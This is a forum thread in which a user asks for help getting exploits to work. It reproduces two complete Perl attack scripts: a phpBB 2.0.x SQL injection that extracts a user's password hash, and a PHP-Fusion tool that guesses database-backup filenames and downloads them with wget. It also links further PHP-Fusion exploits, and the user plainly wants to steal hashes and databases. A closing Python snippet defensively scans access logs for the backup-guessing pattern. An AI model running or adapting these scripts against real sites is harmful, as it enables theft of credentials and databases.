Exploit
I'm learning PHP, it's just that I've been sitting here for 3 hours already and can't get Apache to start properly.. in short, nonsense.. It shows Unable to find logs, then it shows that it can't find the services.. Nonsense, basically.. how the hell do I start it..
GODhack wrote: Either learn what PHP is, or keep running it through Perl.
In short, is there maybe some exploit for Perl to get a PHP-Fusion user's hash?
I need help.. Here is an exploit for a phpBB forum, everything works fine, but it just doesn't show the hash. It shows finished but doesn't show the hash.. Why?
#!/usr/bin/perl
print q{
_________________________________________________________________________
# Exploit: All Topics Hack Sql injection
# For: phpBB ( 2.0.x - 2.0.21 )
_________________________________________________________________________
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
# milw0rm.com [2006-08-23]
Use the ones for version 6.00.306. There are 2 of them:
PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit:
http://www.milw0rm.com/exploits/1796
PHP-Fusion <= 6.00.306 Multiple Vulnerabilities Exploit:
http://www.milw0rm.com/exploits/1760
There's a problem with this one too. This one is supposed to pull the DB out of the site, but when I enter everything it shows some kind of never-ending message... Help..
#!/usr/bin/perl
###########################
# D A R K A S S A S S I N S C R E W 2 0 0 5 #
###########################
# Dark Assassins - http://dark-assassins.com/ #
# Visit us on IRC @ irc.tddirc.net #DarkAssassins #
###########################
# phpfusiondb.pl; Version 0.1 22/06/05 #
# PHP-Fusion db backup proof-of-concept by Easyex #
# Database backup vuln in v6.00.105 and below #
###########################
# Description: When a db (database) backup is made #
# it is saved in /administration/db_backups/ on 6.0 #
# and on 5.0 it is saved in /fusion_admin/db_backups/#
# The backup file can be saved in 2 formats: .sql or #
# .sql.gz and is hidden by a blank index.php file but#
# can be downloaded client-side, The filename is for #
# example : backup_2005-06-22_2208.sql.gz so what we #
# can do is generate 0001 to 9999 and request the #
# file and download it. If a db file is found an #
# attacker can get the admin hash and crack it or #
# retrieve other sensitive information from the db! #
###########################
# 9999 requests to the host is alot, And would get noticed in the server log!
# If you re-coded your own script with proxy support you would be fine.
# You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly
# backup the php-fusiondatabase.
my $wget='wget';
my $count='0';
my $target;
if (@ARGV < 4)
{
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";
print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
print "\n";
exit();
}
my $host = $ARGV[0];
my $ver = $ARGV[1];
my $file = $ARGV[2];
my $extension = $ARGV[3];
if ($ver eq "6") {
$dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
}
if ($ver eq "5") {
$dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Host: $host\n";
print "Directory: $dir\n";
print "File: $file + 0001 to 9999\n";
print "Extension: $extension\n";
print "\n";
print "Attempting to find a db backup file on $host\n";
for($count=0;$count<9999;$count++) {
$target=$host.$dir.$file.sprintf("%04d", $count).$extension;
system("$wget $target");
}
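Added example, not part of the thread or of either script: the header comment of phpfusiondb.pl notes that thousands of guessed backup names "would get noticed in the server log", and this is one way a site owner could check an access log for that pattern and for backups that were actually served. It assumes Apache combined log format; the function names, the threshold and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Backup folders and file-name shape as given in the script's header comment.
BACKUP_RE = re.compile(
    r'"(?:GET|HEAD) (?P<dir>/administration/db_backups/|/fusion_admin/db_backups/)'
    r'(?P<name>backup_\d{4}-\d{2}-\d{2}_\d{4}\.sql(?:\.gz)?) HTTP/[\d.]+" (?P<status>\d{3})'
)

def scan(lines, threshold=5):
    """Return (enumerators, leaks).

    enumerators: {client_ip: count of distinct backup names requested} for
                 clients at or above `threshold` (the guessing pattern).
    leaks:       [(client_ip, path)] for every backup request answered 200,
                 i.e. a database dump that was served to a client.
    """
    seen = defaultdict(set)
    leaks = []
    for line in lines:
        m = BACKUP_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        seen[ip].add(m["name"])
        if m["status"] == "200":
            leaks.append((ip, m["dir"] + m["name"]))
    enumerators = {ip: len(n) for ip, n in seen.items() if len(n) >= threshold}
    return enumerators, leaks

# Constructed sample log; client addresses are from documentation ranges.
def sample_log():
    fmt = '{ip} - - [23/Jun/2005:22:10:{s:02d} +0000] "GET {p} HTTP/1.0" {st} 512 "-" "Wget/1.9"'
    out = [fmt.format(ip="192.0.2.10", s=i % 60, st=404,
                      p=f"/administration/db_backups/backup_2005-06-23_{i:04d}.sql.gz")
           for i in range(40)]
    out.append(fmt.format(ip="192.0.2.10", s=41, st=200,
                          p="/administration/db_backups/backup_2005-06-23_2208.sql.gz"))
    out.append(fmt.format(ip="198.51.100.7", s=50, st=200, p="/index.php"))
    # A single fetch of one backup: a served dump, but not enumeration.
    out.append(fmt.format(ip="203.0.113.5", s=55, st=200,
                          p="/fusion_admin/db_backups/backup_2005-06-20_0300.sql"))
    return out

if __name__ == "__main__":
    enum, leaks = scan(sample_log())
    print("enumerating clients:", enum)
    print("backups served:", leaks)
```

Any entry in the second list means a dump left the server; the backup folder should not be reachable over HTTP at all, so the expected status for these paths is 403 or 404.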